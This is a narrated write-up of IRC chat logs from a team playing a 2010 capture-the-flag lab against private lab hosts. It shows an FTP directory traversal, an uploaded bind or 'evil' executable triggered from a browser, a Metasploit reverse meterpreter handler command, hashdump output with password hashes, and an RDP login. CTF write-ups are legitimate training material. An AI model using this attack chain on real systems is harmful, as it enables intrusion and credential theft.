Chapter 2 - PART 01 : Searching the graves
Entering the VPN, we had to fix our objectives, and that is TecR0c's speciality:
[18:32] <@TecR0c> the target is actually
[18:32] <@TecR0c> http://192.168.6.67/
[18:32] <@TecR0c> muahahaha
[18:33] <@Sud0> hahahaha
[18:33] <@Sud0> np
[18:33] <@Sud0> :)
[18:33] <@mr_me> nice brother
[18:33] <@TecR0c> we are gonna own this !
A few minutes later there was a big silence in the IRC channel:
[18:39] <@Sud0> anyone here ?
[18:40] <@mr_me> we are here
[18:40] <@mr_me> just working
[18:40] <@mr_me> my friend
[18:40] <@mr_me> :)
[18:42] <@Sud0> though
[18:42] <@Sud0> i lost connection
[18:42] <@Sud0> nothing was moving here :)
As I said before, TecR0c was an expert at selecting targets, so we had to change target again ;)
[18:47] <@TecR0c> 71 72 are the same as well
[18:48] <@Sud0> i saw it
[18:48] <@ekse> hi guys
[18:48] <@Sud0> hi ekse
[18:49] <@TecR0c> you can ftp to 192.168.6.70
[18:49] <@TecR0c> anonymous
[18:50] <@mr_me> ftp access
[18:50] <@TecR0c> yep it windows 7 ultimate
[18:51] <@Sud0> yes
[18:51] <@TecR0c> i think its 64bit as well
[18:51] <@Sud0> directory traversal
[18:51] <@Sud0> not working
Still following TecR0c, who wanted to use a new ROP technique :)
[18:51] <@TecR0c> lets do ROP
[18:51] <@TecR0c> lol
[18:52] <@Sud0> hahaha
[18:53] <@Sud0> @TecR0c all surgemail are post auth exploit
Then mr_me arrived with fresh, sweet and technical ideas :)
[19:25] <@Sud0> hola mr_me
[19:26] <@mr_me> Sud0: hola
[19:26] <@mr_me> ok so im abit stumped
[19:26] <@Sud0> ssup ? :)
[19:26] <@Sud0> hahah
[19:27] <@Sud0> what's happening ?
[19:27] <@mr_me> 6.67 is just login prompt
[19:27] <@mr_me> prompts
[19:27] <@Sud0> hahahaha yes
[19:27] <@mr_me> and 6.70 webmail
[19:27] <@mr_me> duno yet
[19:27] <@Sud0> yup :)
[19:27] <@mr_me> i might bruteforce a pop account
[19:27] <@mr_me> or ftp
[19:27] <@mr_me> but duno any undernsmae
[19:27] <@mr_me> usernames**
After that, TecR0c made an extraordinary discovery using his ROP technique:
[19:36] <@TecR0c> wdf
[19:36] <@TecR0c> its linux box
[19:36] <@_sinn3r> are you guys playing w/ CTF at the moment?
[19:37] <@Sud0> @mr_me not vuln on that
[19:37] <@Sud0> yes _sinn3r and u ?
[19:37] <@_sinn3r> at the moment, no
[19:37] <@TecR0c> its ubuntu 8.10
[19:37] <@TecR0c> ;)
[19:37] <@Sud0> what IP TecR0c ?
[19:37] <@_sinn3r> kinda busy with exploit-db... lots of tickets.
[19:38] <@TecR0c> 71
[19:38] <@_sinn3r> I did hear it's pretty nasty... a couple guys at exploit-db were working on the CTF labs.
[19:38] <@TecR0c> ah
[19:38] <@TecR0c> wait
[19:38] <@TecR0c> lol
[19:38] <@TecR0c> its my machine hehe
[19:38] <@TecR0c> =]
[19:38] <@Sud0> hahahahahhahaha
[19:38] <@Sud0> hahahahahhahaha
[19:38] <@TecR0c> got excited for one sec
[19:38] <@TecR0c> :P
[19:40] <@Sud0> héhé
[19:41] <@Sud0> 71 ---> vista ultimate ;)
After analysing the machine, we agreed on a nice plan:
[20:51] <@Sud0> @tecR0c 21 -------------> should be vuln to directory traversal
[20:52] <@TecR0c> so what we need to do ?
[20:52] <@Sud0> 1- got a directory traversal
[20:52] <@Sud0> here is the scenario
[20:53] <@Sud0> 1- directory traversal on Complete FTP
[20:53] <@Sud0> 2- Get an account on webmail
[20:53] <@Sud0> 3- use a remote exploit against webmail to get root (i ment shell)
[20:53] <@Sud0> 4- use a local root exploit against qualcomm popassd
[20:53] <@Sud0> got it ?
[20:53] <@mr_me> yeh
[20:54] <@mr_me> qualcom
[20:54] <@mr_me> we knew
[20:54] <@TecR0c> cool
[20:54] <@TecR0c> ok lets make this happen
After six hours of trying a directory traversal as anonymous against machine 70 without success, Lincoln came to save us:
[23:30] <@corelanc0d3r> doing full scan
[23:30] <@Lincoln> cd \..\..\
[23:31] <@Sud0> @Lincoln : not working with me
[23:31] <@Sud0> i tested it 10000 times
[23:32] <@Sud0> @Lincoln don't work cd \..\..\
[23:32] <@Lincoln> ftp> pwd
[23:32] <@Lincoln> 257 "/MyDocuments" is current directory.
[23:32] <@Lincoln> ftp> ls
[23:32] <@Lincoln> 200 PORT command successful.
[23:32] <@Lincoln> 150 Opening ASCII mode data connection for listing
[23:32] <@Lincoln> dr-xrwx--- 1 admin users 0 May 07 23:49 My Music
[23:32] <@Lincoln> dr-xrwx--- 1 admin users 0 May 07 23:49 My Pictures
[23:32] <@Lincoln> dr-xrwx--- 1 admin users 0 May 07 23:49 My Videos
[23:32] <@Lincoln> dr-xrwx--- 1 admin users 0 May 08 00:03 test
[23:32] <@Lincoln> 226 Transfer complete.
[23:32] <@Sud0> shit
[23:32] <@Lincoln> ftp> cd \..\..\
Lincoln explained the problem to us, and TecR0c finished it with a nice phrase:
[23:35] <@Sud0> devil
[23:35] <@_sinn3r> I still can't get noobSeccret.txt.......... the damn thing just times out.
[23:35] <@Sud0> what pass ?
[23:35] <@Lincoln> killthen00b
[23:35] <@chap0> I mentioned it earlier but
[23:35] <@chap0> hahaha
[23:35] <@chap0> it was on the page they said to read the whole page
[23:35] <@chap0> haha
[23:35] <@chap0> :D
[23:35] <@chap0> anyway good going linc for bringing it to the light!
[23:35] <@_sinn3r> "Gateway Time-out
[23:35] <@_sinn3r> The gateway did not receive a timely response from the upstream server or application."
[23:36] <@Sud0> nice lol
[23:36] <@Sud0> where on the website Lincoln lol
[23:36] <@Lincoln> FTP Credentials are : devil / killthen00b
[23:36] <@Lincoln> under helpful hints on the bottom
[23:36] <@Lincoln> of info blog
[23:36] <@Sud0> hahahahaha
[23:37] <@Sud0> i'm so umb
[23:37] <@Sud0> i dumb
[23:37] <@Sud0> lol
[23:37] <@TecR0c> WTF
After some teamwork we discovered the default executable folder of SurgeMail in which to put our backdoor:
[00:11] <@Lincoln> try cd /MyDocuments/....../....../....../..../....../surgemail/web
[00:11] <@TecR0c> 07 23:52:18.13:1876: IMAP 3.8k4-4, User connected (192.168.6.143) (192.168.6.71) socket=1588
[00:11] <@TecR0c> ok so the people who have owned it must have to use imap as well
[00:11] <@TecR0c> ;/
[00:17] <@Sud0> CGI did not respond correctly, it probably exited abnormally or the file may not exist or have +x access (bind.exe) ()
[00:18] <@Sud0> http://192.168.6.71/scripts/bind.exe
[00:21] <@mr_me> hey sudo
[00:21] <@mr_me> u have web root
[00:21] <@mr_me> ?
[00:22] <@_sinn3r> you think 192.168.6.72 supports ASP?
[00:22] <@_sinn3r> server: DManager........
[00:23] <@_sinn3r> nnnnnoope...
[00:23] <@Sud0> hum
[00:23] <@Sud0> yes
[00:23] <@Sud0> shit
[00:23] <@Sud0> but
[00:23] <@Sud0> i loaded
[00:23] <@Sud0> the exe
[00:23] <@Sud0> bind.exe
[00:23] <@Lincoln> yeah i missed that one lol
[00:23] <@Sud0> http://192.168.6.71/scripts/bind.exe
[00:23] <@Lincoln> http://192.168.6.72/evil.html
[00:23] <@Sud0> http://192.168.6.71/scripts/bind.exe
[00:24] <@_sinn3r> bindshell for what port?
[00:24] <@Sud0> 4444
09/05/2010 :
A new day, and corelanc0d3r started thinking about new technologies and doing what he loves best: writing nice articles and blogs:
[00:31] <@corelanc0d3r> trying some stuff
[00:31] <@corelanc0d3r> but
[00:31] <@corelanc0d3r> perhaps this may help
[00:31] <@corelanc0d3r> go to the admin page of surgemail
[00:31] <@corelanc0d3r> log in with admin account
[00:31] <@corelanc0d3r> corelanc0d3r
[00:31] <@corelanc0d3r> password
[00:31] <@corelanc0d3r> admimn
[00:31] <@corelanc0d3r> admin
[00:31] <@corelanc0d3r> you can create blogs
[00:32] <@corelanc0d3r> maybe we can do something with this
[00:33] <@corelanc0d3r> http://192.168.6.70/blogs/corelanc0d3r
[00:34] <@corelanc0d3r> hahaha
After that, Lincoln gave us a nice shell:
[00:46] <@Lincoln> CAN YOU SAY WOOT
[00:46] <@Lincoln> msf exploit(mhandler) > exploit
[00:46] <@Lincoln> [*] Started reverse handler on 192.168.6.135:4444
[00:46] <@Lincoln> [*] Starting the payload handler...
[00:46] <@Lincoln> [*] Sending stage (748032 bytes) to 192.168.6.135
[00:46] <@Lincoln> [*] Meterpreter session 1 opened (192.168.6.135:4444 -> 192.168.6.135:44382)
[00:46] <@_sinn3r> whoa, how?
[00:46] <@corelanc0d3r> wtf
[00:46] <@corelanc0d3r> :D
[00:46] <@_sinn3r> how?
[00:47] <@TecR0c> wtf
[00:47] <@TecR0c> ohyeeeeee
[00:47] <@mr_me> fukn hell
[00:47] <@TecR0c> your the man
[00:47] <@TecR0c> =]
[00:47] <@_sinn3r> how how how how how
[00:47] <@chap0> lol
[00:47] <@mr_me> WOW
But it was not as nice as it looked:
[00:48] <@Lincoln> ignore it guys
[00:48] <@Lincoln> no
[00:48] <@Lincoln> no
[00:48] <@Lincoln> i fucked up
[00:48] <@Lincoln> hahahaha
[00:48] <@corelanc0d3r> not worky ?
[00:48] <@Sud0> hahaha
[00:48] <@Sud0> :)
[00:48] <@Lincoln> no....
[00:48] <@Lincoln> too stupid to admit
[00:48] <@Lincoln> sorry guys ignore
[00:48] <@Sud0> your own machine
[00:48] <@Sud0> :)
[00:48] <@Lincoln> yep....
[00:48] <@Lincoln> hahahah
[00:48] <@_sinn3r> awwwwwwwwww......
[00:48] <@Lincoln> im sorry
[00:48] <@Lincoln> lol
[00:48] <@_sinn3r> :-)
[00:49] <@Lincoln> <------------- SUPER embarrassed
After I was disconnected, with my unsuccessful bind shell, the team continued to work on the killthen00b machine (one man can't make a team), and there was a shell:
[01:02] <@corelanc0d3r> ok - need a little help here
[01:02] <@corelanc0d3r> how do I set up metasploit
[01:02] <@corelanc0d3r> to listen for a reverse incoming meterpreter session
[01:02] <@corelanc0d3r> on let's say port 5555
[01:02] <@TecR0c> multi/handler
[01:03] <@TecR0c> use multi/handler
[01:03] <@TecR0c> show options
[01:03] <@_sinn3r> ./msfcli multi/handler payload=windows/meterpreter_reverse_tcp lhost=[your ip] lport=5555 E
[01:04] <@corelanc0d3r> failed Payload has not been selected
[01:04] <@_sinn3r> windows/meterpreter/reverse_tcp
[01:06] <@corelanc0d3r> reverting box again ?
[01:06] <@_sinn3r> two more people just got 50 pts......
[01:11] <@corelanc0d3r> bloody hell
[01:11] <@corelanc0d3r> rooted .70
[01:11] <@_sinn3r> how?
[01:11] <@corelanc0d3r> simple
[01:11] <@corelanc0d3r> really simple
[01:11] <@corelanc0d3r> ftp traversal
[01:11] <@corelanc0d3r> go to c:\surgemail\scripts
[01:11] <@corelanc0d3r> upload eveil
[01:11] <@corelanc0d3r> evil exe
[01:11] <@corelanc0d3r> call it from browser
[01:11] <@corelanc0d3r> done
Here we are: using meterpreter, one of the glorious warriors opened a remote desktop:
[01:21] <@_sinn3r> ok mr_me
[01:21] <@_sinn3r> do this
[01:21] <@_sinn3r> rdesktop 192.168.6.70
[01:21] <@_sinn3r> username: sinn3r
[01:21] <@_sinn3r> password: veryphat
[01:21] <@mr_me> woot
[01:21] <@mr_me> shell
[01:22] <@Lincoln> ahh sexy
[01:22] <@Lincoln> meterpreter > run hashdump
[01:22] <@Lincoln> [*] Obtaining the boot key...
[01:22] <@Lincoln> [*] Calculating the hboot key using SYSKEY 8cbc4040791fac141f35cba5f197d50f...
[01:22] <@Lincoln> [*] Obtaining the user list and keys...
[01:22] <@Lincoln> [*] Decrypting user keys...
[01:22] <@Lincoln> [*] Dumping password hashes...
[01:22] <@Lincoln> Administrator:500:aad3b435b51404eeaad3b435b51404ee:07eaa2b600669980aa3268fd8cc3f0e5:::
[01:22] <@Lincoln> Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[01:22] <@Lincoln> devil:1001:aad3b435b51404eeaad3b435b51404ee:3cc3bac4b37e26d8208469533c59e2c6:::
[01:22] <@Lincoln> sinn3r:1002:aad3b435b51404eeaad3b435b51404ee:05597a07ce55307b3e6a3bd1a7abe12d:::
[01:22] <@Lincoln> going to run those through offsec cracker
And finally they took the beast down:
[01:28] <@_sinn3r> I don't see a proof.txt in devil's desktop
[01:28] <@_sinn3r> Peter, what am I supposed to look for?
[01:30] <@_sinn3r> ?
[01:30] <@corelanc0d3r> Administrators Desktop
[01:30] <@_sinn3r> ok... damn, just the wrong desktop
[01:30] <@Lincoln> can someone rehit evil.exe
[01:30] <@Lincoln> on .70
[01:30] <@_sinn3r> hit
[01:30] <@Lincoln> thanks
[01:32] <@Lincoln> doh
[01:32] <@Lincoln> no tftp on win7
[01:32] <@Lincoln> thats right
[01:32] <@_sinn3r> you need to manually enable it
[01:32] <@Lincoln> sinner you still on rdp?
[01:32] <@_sinn3r> not anymore. go ahead.
[01:33] <@_sinn3r> meterpreter > cat proof.txt
[01:33] <@_sinn3r> a61b0c1bf71267289efeecf778b1e51e
[01:34] <@Lincoln> oO rolf
[01:34] <@corelanc0d3r> does anyone know if there is only one proof file per machine ?
[01:34] <@Lincoln> a61b0c1bf71267289efeecf778b1e51e
[01:34] <@Lincoln> k got it
[01:34] <@_sinn3r> woohoo 50 pts
[01:35] <@corelanc0d3r> nicey
Tuesday, 11 May 2010